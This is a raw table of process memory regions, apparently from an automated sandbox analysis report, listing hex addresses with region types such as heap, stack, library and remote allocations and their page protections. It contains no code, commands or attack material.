EF427F9000
|
stack
|
page read and write
|
||
140411000
|
unkown
|
page execute and read and write
|
||
1EEBFA88000
|
heap
|
page read and write
|
||
191F000
|
stack
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
1EEBFE0F000
|
heap
|
page read and write
|
||
7FFD3494A000
|
trusted library allocation
|
page read and write
|
||
270C66F0000
|
heap
|
page read and write
|
||
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
1D400000
|
heap
|
page read and write
|
||
232676B5000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
42BC000
|
trusted library allocation
|
page read and write
|
||
D88A0FD000
|
stack
|
page read and write
|
||
232776C1000
|
trusted library allocation
|
page read and write
|
||
270C7731000
|
trusted library allocation
|
page read and write
|
||
29DD3E30000
|
trusted library allocation
|
page read and write
|
||
2373D95A000
|
heap
|
page read and write
|
||
270DEEE2000
|
heap
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
23267853000
|
trusted library allocation
|
page read and write
|
||
29DE4290000
|
trusted library allocation
|
page read and write
|
||
4345000
|
trusted library allocation
|
page read and write
|
||
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
2C8B56C4000
|
heap
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
798EECE000
|
stack
|
page read and write
|
||
29DEC432000
|
heap
|
page read and write
|
||
142D9000
|
trusted library allocation
|
page read and write
|
||
1EEBFC8D000
|
heap
|
page read and write
|
||
270D69F9000
|
trusted library allocation
|
page read and write
|
||
270C7301000
|
trusted library allocation
|
page read and write
|
||
23277D07000
|
trusted library allocation
|
page read and write
|
||
1B5B0000
|
trusted library allocation
|
page read and write
|
||
270C6185000
|
heap
|
page read and write
|
||
1401EB000
|
unkown
|
page execute and read and write
|
||
2C8B54B0000
|
heap
|
page read and write
|
||
2327789D000
|
trusted library allocation
|
page read and write
|
||
29DEC488000
|
heap
|
page read and write
|
||
7FFD347A2000
|
trusted library allocation
|
page read and write
|
||
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
1D0B1000
|
heap
|
page read and write
|
||
1EEA7675000
|
trusted library allocation
|
page read and write
|
||
1D83F000
|
heap
|
page read and write
|
||
1D720000
|
heap
|
page read and write
|
||
23725210000
|
trusted library allocation
|
page read and write
|
||
4119000
|
trusted library allocation
|
page read and write
|
||
145E000
|
stack
|
page read and write
|
||
1EEBFBA0000
|
heap
|
page read and write
|
||
1EEBFD70000
|
heap
|
page read and write
|
||
7FFD349D4000
|
trusted library allocation
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
232000B4000
|
heap
|
page read and write
|
||
13CB9000
|
trusted library allocation
|
page read and write
|
||
13587000
|
trusted library allocation
|
page read and write
|
||
EBD000
|
heap
|
page read and write
|
||
23277CB8000
|
trusted library allocation
|
page read and write
|
||
7FFD34846000
|
trusted library allocation
|
page execute and read and write
|
||
23267A43000
|
trusted library allocation
|
page read and write
|
||
29DD3F90000
|
heap
|
page read and write
|
||
1EEA53EC000
|
heap
|
page read and write
|
||
232002F4000
|
heap
|
page read and write
|
||
7FFD3492A000
|
trusted library allocation
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
232659F0000
|
trusted library allocation
|
page read and write
|
||
7FFD347AB000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA58BB000
|
heap
|
page read and write
|
||
798EFCC000
|
stack
|
page read and write
|
||
798E079000
|
stack
|
page read and write
|
||
14029000
|
trusted library allocation
|
page read and write
|
||
7FFD34AE4000
|
trusted library allocation
|
page read and write
|
||
1C708000
|
heap
|
page read and write
|
||
1361B000
|
trusted library allocation
|
page read and write
|
||
3EA7000
|
trusted library allocation
|
page read and write
|
||
1EEBFBDB000
|
heap
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page execute and read and write
|
||
270C6BCE000
|
trusted library allocation
|
page read and write
|
||
232005F7000
|
heap
|
page read and write
|
||
1EEBFB8C000
|
heap
|
page read and write
|
||
1EEA75AA000
|
trusted library allocation
|
page read and write
|
||
13D71000
|
trusted library allocation
|
page read and write
|
||
7FFD34984000
|
trusted library allocation
|
page read and write
|
||
7DF445570000
|
trusted library allocation
|
page execute and read and write
|
||
270C851C000
|
trusted library allocation
|
page read and write
|
||
3510000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
232005AA000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
140368000
|
remote allocation
|
page execute and read and write
|
||
2372678C000
|
trusted library allocation
|
page read and write
|
||
29DD3A30000
|
heap
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
1D878000
|
heap
|
page read and write
|
||
7FFD347CB000
|
trusted library allocation
|
page execute and read and write
|
||
1C8C0000
|
heap
|
page read and write
|
||
1D634000
|
heap
|
page read and write
|
||
270C6580000
|
trusted library allocation
|
page read and write
|
||
1CBCE000
|
stack
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
14079A000
|
unkown
|
page execute and read and write
|
||
140367000
|
unkown
|
page execute and read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
2320017E000
|
heap
|
page read and write
|
||
3DA7000
|
trusted library allocation
|
page read and write
|
||
4105000
|
trusted library allocation
|
page read and write
|
||
1EEBFC1E000
|
heap
|
page read and write
|
||
23200658000
|
heap
|
page read and write
|
||
29DD4B96000
|
trusted library allocation
|
page read and write
|
||
270DEF41000
|
heap
|
page read and write
|
||
F03000
|
heap
|
page read and write
|
||
1300000
|
heap
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA7241000
|
trusted library allocation
|
page read and write
|
||
798DCFF000
|
stack
|
page read and write
|
||
232676C8000
|
trusted library allocation
|
page read and write
|
||
1EEBFAEF000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
3F6F000
|
trusted library allocation
|
page read and write
|
||
23267AA0000
|
trusted library allocation
|
page read and write
|
||
1EEBFD64000
|
heap
|
page read and write
|
||
270DEEF8000
|
heap
|
page read and write
|
||
23267A7F000
|
trusted library allocation
|
page read and write
|
||
3CE0000
|
trusted library allocation
|
page read and write
|
||
232777C5000
|
trusted library allocation
|
page read and write
|
||
EF42D3E000
|
stack
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
29DEC5C0000
|
heap
|
page read and write
|
||
23200669000
|
heap
|
page read and write
|
||
2320068B000
|
heap
|
page read and write
|
||
F86000
|
heap
|
page read and write
|
||
270C72FF000
|
trusted library allocation
|
page read and write
|
||
1EEA75C4000
|
trusted library allocation
|
page read and write
|
||
EF4267F000
|
stack
|
page read and write
|
||
1EEA5430000
|
heap
|
page read and write
|
||
3C2E000
|
trusted library allocation
|
page read and write
|
||
23277C93000
|
trusted library allocation
|
page read and write
|
||
13B7A000
|
trusted library allocation
|
page read and write
|
||
1D57F000
|
heap
|
page read and write
|
||
7FFD3478B000
|
trusted library allocation
|
page execute and read and write
|
||
D90000
|
heap
|
page read and write
|
||
270C5E10000
|
heap
|
page read and write
|
||
270D6731000
|
trusted library allocation
|
page read and write
|
||
232005EB000
|
heap
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
23726705000
|
trusted library allocation
|
page read and write
|
||
23277A99000
|
trusted library allocation
|
page read and write
|
||
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
270DEFD0000
|
trusted library allocation
|
page read and write
|
||
2373D94E000
|
heap
|
page read and write
|
||
1D825000
|
heap
|
page read and write
|
||
7FFD34772000
|
trusted library allocation
|
page read and write
|
||
7DF47B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
D88B00E000
|
stack
|
page read and write
|
||
1C71D000
|
heap
|
page read and write
|
||
7FFD3483C000
|
trusted library allocation
|
page execute and read and write
|
||
23265A50000
|
heap
|
page execute and read and write
|
||
F8D13FF000
|
stack
|
page read and write
|
||
7FFD3493A000
|
trusted library allocation
|
page read and write
|
||
7FFD349B9000
|
trusted library allocation
|
page read and write
|
||
7FFD34978000
|
trusted library allocation
|
page read and write
|
||
1EEBFE29000
|
heap
|
page read and write
|
||
1EEA71B4000
|
trusted library allocation
|
page read and write
|
||
270C7309000
|
trusted library allocation
|
page read and write
|
||
2320049C000
|
heap
|
page read and write
|
||
2326769B000
|
trusted library allocation
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
29DD3FA1000
|
trusted library allocation
|
page read and write
|
||
232658F6000
|
heap
|
page read and write
|
||
7FFD34792000
|
trusted library allocation
|
page read and write
|
||
2372589F000
|
trusted library allocation
|
page read and write
|
||
1C730000
|
heap
|
page read and write
|
||
270DEC90000
|
heap
|
page read and write
|
||
1D52E000
|
heap
|
page read and write
|
||
23277C3D000
|
trusted library allocation
|
page read and write
|
||
1C6E7000
|
heap
|
page read and write
|
||
1EEBF9C8000
|
heap
|
page read and write
|
||
232678B4000
|
trusted library allocation
|
page read and write
|
||
270DEDBC000
|
heap
|
page read and write
|
||
140329000
|
remote allocation
|
page execute and read and write
|
||
2C8B6F10000
|
heap
|
page read and write
|
||
270C7337000
|
trusted library allocation
|
page read and write
|
||
F8D16FE000
|
stack
|
page read and write
|
||
1EEA70B0000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
270DEF2E000
|
heap
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
1EEA6EDF000
|
heap
|
page read and write
|
||
7FFD347CD000
|
trusted library allocation
|
page execute and read and write
|
||
270C6170000
|
trusted library allocation
|
page read and write
|
||
1401D2000
|
remote allocation
|
page execute and read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
23726B4E000
|
trusted library allocation
|
page read and write
|
||
270C6787000
|
trusted library allocation
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
3DB5000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
1EEA7290000
|
trusted library allocation
|
page read and write
|
||
29DE4298000
|
trusted library allocation
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
EB0000
|
heap
|
page read and write
|
||
1445D000
|
trusted library allocation
|
page read and write
|
||
237271F1000
|
trusted library allocation
|
page read and write
|
||
270D69F1000
|
trusted library allocation
|
page read and write
|
||
2320055D000
|
heap
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34BF0000
|
trusted library allocation
|
page read and write
|
||
270DEDB0000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
23726388000
|
trusted library allocation
|
page read and write
|
||
1EEBFAD0000
|
heap
|
page read and write
|
||
7FFD347BB000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA56D0000
|
heap
|
page read and write
|
||
7FFD347BC000
|
trusted library allocation
|
page execute and read and write
|
||
1C75D000
|
heap
|
page read and write
|
||
7FFD34AC3000
|
trusted library allocation
|
page read and write
|
||
1C990000
|
heap
|
page read and write
|
||
7FFD34846000
|
trusted library allocation
|
page read and write
|
||
140140000
|
remote allocation
|
page execute and read and write
|
||
1D7DB000
|
heap
|
page read and write
|
||
7FFD349B4000
|
trusted library allocation
|
page read and write
|
||
2327F550000
|
trusted library allocation
|
page read and write
|
||
2373D966000
|
heap
|
page read and write
|
||
270C5E65000
|
heap
|
page read and write
|
||
140439000
|
remote allocation
|
page execute and read and write
|
||
23267893000
|
trusted library allocation
|
page read and write
|
||
7FFD34974000
|
trusted library allocation
|
page read and write
|
||
1EEA765A000
|
trusted library allocation
|
page read and write
|
||
FDC000
|
heap
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page execute and read and write
|
||
13E1000
|
stack
|
page read and write
|
||
3DA0000
|
trusted library allocation
|
page read and write
|
||
140241000
|
unkown
|
page execute and read and write
|
||
7FFD349B2000
|
trusted library allocation
|
page read and write
|
||
798E2FE000
|
stack
|
page read and write
|
||
1EEBFC0C000
|
heap
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
237353F1000
|
trusted library allocation
|
page read and write
|
||
1EEA73CB000
|
trusted library allocation
|
page read and write
|
||
18C0000
|
heap
|
page read and write
|
||
1D869000
|
heap
|
page read and write
|
||
29DEC71B000
|
heap
|
page read and write
|
||
1C660000
|
trusted library section
|
page read and write
|
||
270C6160000
|
trusted library section
|
page read and write
|
||
29DD3EA0000
|
trusted library allocation
|
page read and write
|
||
2326777E000
|
trusted library allocation
|
page read and write
|
||
14006A000
|
unkown
|
page execute and read and write
|
||
1D75E000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
2320032D000
|
heap
|
page read and write
|
||
7FFD34B90000
|
trusted library allocation
|
page read and write
|
||
D88A43F000
|
stack
|
page read and write
|
||
270C5E20000
|
heap
|
page read and write
|
||
7FFD34763000
|
trusted library allocation
|
page execute and read and write
|
||
F8D0DCC000
|
stack
|
page read and write
|
||
1EEA538E000
|
heap
|
page read and write
|
||
29DD5829000
|
trusted library allocation
|
page read and write
|
||
1403AF000
|
unkown
|
page execute and read and write
|
||
270DEB93000
|
heap
|
page read and write
|
||
7FFD34984000
|
trusted library allocation
|
page read and write
|
||
140784000
|
remote allocation
|
page execute and read and write
|
||
23267612000
|
trusted library allocation
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
7FFD34793000
|
trusted library allocation
|
page execute and read and write
|
||
F45000
|
heap
|
page read and write
|
||
2372670A000
|
trusted library allocation
|
page read and write
|
||
EF423C3000
|
stack
|
page read and write
|
||
140296000
|
remote allocation
|
page execute and read and write
|
||
232677DA000
|
trusted library allocation
|
page read and write
|
||
1EEB7893000
|
trusted library allocation
|
page read and write
|
||
7FFD34998000
|
trusted library allocation
|
page read and write
|
||
2373DC24000
|
heap
|
page read and write
|
||
140315000
|
unkown
|
page execute and read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
270C7152000
|
trusted library allocation
|
page read and write
|
||
2326798A000
|
trusted library allocation
|
page read and write
|
||
7FFD347B4000
|
trusted library allocation
|
page read and write
|
||
23725458000
|
trusted library allocation
|
page read and write
|
||
7FFD34B20000
|
trusted library allocation
|
page read and write
|
||
2373D8DB000
|
heap
|
page read and write
|
||
270DEDAC000
|
heap
|
page read and write
|
||
7FFD34988000
|
trusted library allocation
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
237356CB000
|
trusted library allocation
|
page read and write
|
||
7FFD34982000
|
trusted library allocation
|
page read and write
|
||
1386000
|
heap
|
page read and write
|
||
13E0B000
|
trusted library allocation
|
page read and write
|
||
7FF419E80000
|
trusted library allocation
|
page execute and read and write
|
||
2C8B56A7000
|
heap
|
page read and write
|
||
30D0000
|
trusted library allocation
|
page read and write
|
||
23200562000
|
heap
|
page read and write
|
||
1100000
|
trusted library allocation
|
page read and write
|
||
18C5000
|
heap
|
page read and write
|
||
270C6530000
|
trusted library allocation
|
page read and write
|
||
2326783F000
|
trusted library allocation
|
page read and write
|
||
7FFD3478D000
|
trusted library allocation
|
page execute and read and write
|
||
357E000
|
stack
|
page read and write
|
||
4032000
|
trusted library allocation
|
page read and write
|
||
1EEA729E000
|
trusted library allocation
|
page read and write
|
||
1402BA000
|
remote allocation
|
page execute and read and write
|
||
14043A000
|
unkown
|
page execute and read and write
|
||
232000E6000
|
heap
|
page read and write
|
||
2373D3D5000
|
heap
|
page read and write
|
||
3D65000
|
trusted library allocation
|
page read and write
|
||
11E1000
|
stack
|
page read and write
|
||
2326772F000
|
trusted library allocation
|
page read and write
|
||
7FFD34994000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
1D7A3000
|
heap
|
page read and write
|
||
2326595B000
|
heap
|
page read and write
|
||
3EC8000
|
trusted library allocation
|
page read and write
|
||
1EEBFCF6000
|
heap
|
page read and write
|
||
29DD58EA000
|
trusted library allocation
|
page read and write
|
||
7FFD349B3000
|
trusted library allocation
|
page read and write
|
||
D88A4BC000
|
stack
|
page read and write
|
||
410B000
|
trusted library allocation
|
page read and write
|
||
4072000
|
trusted library allocation
|
page read and write
|
||
1C890000
|
heap
|
page read and write
|
||
1D885000
|
heap
|
page read and write
|
||
7FFD347A4000
|
trusted library allocation
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
1720000
|
heap
|
page read and write
|
||
232004B0000
|
heap
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
1EEA5391000
|
heap
|
page read and write
|
||
232004F3000
|
heap
|
page read and write
|
||
40CB000
|
trusted library allocation
|
page read and write
|
||
2320063C000
|
heap
|
page read and write
|
||
23724C10000
|
heap
|
page read and write
|
||
7FFD34941000
|
trusted library allocation
|
page read and write
|
||
29DD3F77000
|
heap
|
page execute and read and write
|
||
14061000
|
trusted library allocation
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347B4000
|
trusted library allocation
|
page read and write
|
||
7FFD3495A000
|
trusted library allocation
|
page read and write
|
||
2320041A000
|
heap
|
page read and write
|
||
1D475000
|
heap
|
page read and write
|
||
7FFD34836000
|
trusted library allocation
|
page read and write
|
||
270C5E61000
|
heap
|
page read and write
|
||
D88A07A000
|
stack
|
page read and write
|
||
1D790000
|
heap
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
EF428F9000
|
stack
|
page read and write
|
||
23265BC0000
|
heap
|
page read and write
|
||
270C5E6D000
|
heap
|
page read and write
|
||
23267AFE000
|
trusted library allocation
|
page read and write
|
||
1403AD000
|
unkown
|
page execute and read and write
|
||
23725320000
|
heap
|
page read and write
|
||
7FFD34B80000
|
trusted library allocation
|
page read and write
|
||
23200487000
|
heap
|
page read and write
|
||
4164000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA76B1000
|
trusted library allocation
|
page read and write
|
||
29DD4028000
|
trusted library allocation
|
page read and write
|
||
7FFD3485C000
|
trusted library allocation
|
page execute and read and write
|
||
13A81000
|
trusted library allocation
|
page read and write
|
||
7FFD34917000
|
trusted library allocation
|
page read and write
|
||
23265B4E000
|
heap
|
page read and write
|
||
7FFD3491A000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page execute and read and write
|
||
1C6CC000
|
heap
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
1EEA5362000
|
heap
|
page read and write
|
||
798DDFE000
|
stack
|
page read and write
|
||
237356C1000
|
trusted library allocation
|
page read and write
|
||
1EEA7380000
|
trusted library allocation
|
page read and write
|
||
1EEA5550000
|
heap
|
page read and write
|
||
3F24000
|
trusted library allocation
|
page read and write
|
||
1D5B3000
|
heap
|
page read and write
|
||
23200573000
|
heap
|
page read and write
|
||
29DEC4CC000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
23267867000
|
trusted library allocation
|
page read and write
|
||
23724C98000
|
heap
|
page read and write
|
||
232677E1000
|
trusted library allocation
|
page read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
1EEA5202000
|
unkown
|
page readonly
|
||
3110000
|
heap
|
page read and write
|
||
D88B18E000
|
stack
|
page read and write
|
||
140365000
|
remote allocation
|
page execute and read and write
|
||
1403F2000
|
remote allocation
|
page execute and read and write
|
||
2373D93E000
|
heap
|
page read and write
|
||
232679DB000
|
trusted library allocation
|
page read and write
|
||
270DEBA2000
|
heap
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
1EEA7220000
|
trusted library allocation
|
page read and write
|
||
2373DBF5000
|
heap
|
page read and write
|
||
2326761F000
|
trusted library allocation
|
page read and write
|
||
153F000
|
heap
|
page read and write
|
||
7FFD347EC000
|
trusted library allocation
|
page execute and read and write
|
||
270C84FC000
|
trusted library allocation
|
page read and write
|
||
232003DB000
|
heap
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
2326790B000
|
trusted library allocation
|
page read and write
|
||
3DD8000
|
trusted library allocation
|
page read and write
|
||
1469000
|
heap
|
page read and write
|
||
29DEC736000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1EEBFD6E000
|
heap
|
page read and write
|
||
7FFD34793000
|
trusted library allocation
|
page execute and read and write
|
||
2373D890000
|
heap
|
page read and write
|
||
23267A25000
|
trusted library allocation
|
page read and write
|
||
7FFD34BE0000
|
trusted library allocation
|
page read and write
|
||
23724B00000
|
heap
|
page read and write
|
||
1D660000
|
heap
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
29DD5172000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
270C6120000
|
heap
|
page read and write
|
||
2C8B5678000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
270DEDF9000
|
heap
|
page read and write
|
||
270C7ABD000
|
trusted library allocation
|
page read and write
|
||
1401C5000
|
remote allocation
|
page execute and read and write
|
||
7FFD34BF0000
|
trusted library allocation
|
page read and write
|
||
7FFD347BB000
|
trusted library allocation
|
page read and write
|
||
270C5E7F000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
3170000
|
heap
|
page execute and read and write
|
||
7DF47B790000
|
trusted library allocation
|
page execute and read and write
|
||
23200647000
|
heap
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
1D7E0000
|
heap
|
page execute and read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
14013E000
|
remote allocation
|
page execute and read and write
|
||
23725290000
|
heap
|
page read and write
|
||
232677E7000
|
trusted library allocation
|
page read and write
|
||
D88A5BB000
|
stack
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
3D21000
|
trusted library allocation
|
page read and write
|
||
1EEBFBBF000
|
heap
|
page read and write
|
||
1C28D000
|
stack
|
page read and write
|
||
1EEA5326000
|
heap
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
270DEDA8000
|
heap
|
page read and write
|
||
7FFD34992000
|
trusted library allocation
|
page read and write
|
||
1EEBF9C1000
|
heap
|
page read and write
|
||
29DD446D000
|
trusted library allocation
|
page read and write
|
||
2373D8FF000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
232004B7000
|
heap
|
page read and write
|
||
3BC3000
|
trusted library allocation
|
page read and write
|
||
232002DC000
|
heap
|
page read and write
|
||
2C939A6D000
|
heap
|
page read and write
|
||
1EEBFA3A000
|
heap
|
page read and write
|
||
2373D9B0000
|
heap
|
page read and write
|
||
7FFD3493E000
|
trusted library allocation
|
page read and write
|
||
270DEE0E000
|
heap
|
page read and write
|
||
1EEBFAA1000
|
heap
|
page read and write
|
||
232005F0000
|
heap
|
page read and write
|
||
13832000
|
trusted library allocation
|
page read and write
|
||
1EEA724E000
|
trusted library allocation
|
page read and write
|
||
7FFD349C9000
|
trusted library allocation
|
page read and write
|
||
3470000
|
trusted library allocation
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
2C8B6F50000
|
heap
|
page read and write
|
||
1403B0000
|
remote allocation
|
page execute and read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
3C40000
|
trusted library allocation
|
page read and write
|
||
141A9000
|
trusted library allocation
|
page read and write
|
||
E10000
|
trusted library allocation
|
page read and write
|
||
1EEBFC68000
|
heap
|
page read and write
|
||
139B000
|
heap
|
page read and write
|
||
23725E23000
|
trusted library allocation
|
page read and write
|
||
1EEBFBE6000
|
heap
|
page read and write
|
||
7FFD348BA000
|
trusted library allocation
|
page execute and read and write
|
||
1C8C5000
|
heap
|
page read and write
|
||
270D69ED000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
E96000
|
heap
|
page read and write
|
||
14047F000
|
unkown
|
page execute and read and write
|
||
1D697000
|
heap
|
page read and write
|
||
1EEA739C000
|
trusted library allocation
|
page read and write
|
||
140314000
|
remote allocation
|
page execute and read and write
|
||
1EEA7358000
|
trusted library allocation
|
page read and write
|
||
1C6E1000
|
heap
|
page read and write
|
||
7FFD347A2000
|
trusted library allocation
|
page read and write
|
||
798EE4E000
|
stack
|
page read and write
|
||
1D4F7000
|
heap
|
page read and write
|
||
1400B3000
|
remote allocation
|
page execute and read and write
|
||
1EEBFA46000
|
heap
|
page read and write
|
||
237353D1000
|
trusted library allocation
|
page read and write
|
||
29DD3F70000
|
heap
|
page execute and read and write
|
||
29DEC803000
|
heap
|
page read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
29DD3840000
|
heap
|
page read and write
|
||
7FFD349C2000
|
trusted library allocation
|
page read and write
|
||
1C786000
|
heap
|
page read and write
|
||
232659C4000
|
heap
|
page read and write
|
||
1EEBFA98000
|
heap
|
page read and write
|
||
7FFD34792000
|
trusted library allocation
|
page read and write
|
||
29DD38C7000
|
heap
|
page read and write
|
||
3EDA000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1EEA58B5000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
7FFD34972000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
270DEDA0000
|
heap
|
page read and write
|
||
1EEBFE08000
|
heap
|
page read and write
|
||
EF42A3E000
|
stack
|
page read and write
|
||
1C8D7000
|
heap
|
page read and write
|
||
237356BD000
|
trusted library allocation
|
page read and write
|
||
7FFD34914000
|
trusted library allocation
|
page read and write
|
||
7FFD34886000
|
trusted library allocation
|
page execute and read and write
|
||
29DE4013000
|
trusted library allocation
|
page read and write
|
||
798E3FF000
|
stack
|
page read and write
|
||
270C5E69000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
270C7A36000
|
trusted library allocation
|
page read and write
|
||
1BD87000
|
heap
|
page read and write
|
||
F8D10FF000
|
stack
|
page read and write
|
||
1EEA538C000
|
heap
|
page read and write
|
||
7FFD34984000
|
trusted library allocation
|
page read and write
|
||
1400B9000
|
unkown
|
page execute and read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
1531000
|
heap
|
page read and write
|
||
7FFD3493C000
|
trusted library allocation
|
page read and write
|
||
798E47B000
|
stack
|
page read and write
|
||
7FFD34934000
|
trusted library allocation
|
page read and write
|
||
7DF445590000
|
trusted library allocation
|
page execute and read and write
|
||
23277C79000
|
trusted library allocation
|
page read and write
|
||
1D09E000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34866000
|
trusted library allocation
|
page execute and read and write
|
||
1340000
|
heap
|
page read and write
|
||
237255F9000
|
trusted library allocation
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
23277521000
|
trusted library allocation
|
page read and write
|
||
1775000
|
heap
|
page read and write
|
||
1EEBFA6E000
|
heap
|
page read and write
|
||
1382A000
|
trusted library allocation
|
page read and write
|
||
29DD4F3F000
|
trusted library allocation
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
1BA30000
|
trusted library allocation
|
page read and write
|
||
1EEA74F4000
|
trusted library allocation
|
page read and write
|
||
2C8B55E0000
|
direct allocation
|
page execute read
|
||
140453000
|
remote allocation
|
page execute and read and write
|
||
140438000
|
remote allocation
|
page execute and read and write
|
||
232679AC000
|
trusted library allocation
|
page read and write
|
||
1D66D000
|
heap
|
page read and write
|
||
140115000
|
unkown
|
page execute and read and write
|
||
93875FE000
|
stack
|
page read and write
|
||
23277D87000
|
trusted library allocation
|
page read and write
|
||
3F62000
|
trusted library allocation
|
page read and write
|
||
2372614C000
|
trusted library allocation
|
page read and write
|
||
1398000
|
heap
|
page read and write
|
||
1D596000
|
heap
|
page read and write
|
||
1D80E000
|
heap
|
page read and write
|
||
1EEBFD56000
|
heap
|
page read and write
|
||
1400ED000
|
unkown
|
page execute and read and write
|
||
1D689000
|
heap
|
page read and write
|
||
140177000
|
remote allocation
|
page execute and read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
13AE9000
|
trusted library allocation
|
page read and write
|
||
40FE000
|
trusted library allocation
|
page read and write
|
||
14034D000
|
unkown
|
page execute and read and write
|
||
1C8DB000
|
heap
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
7FFD3477A000
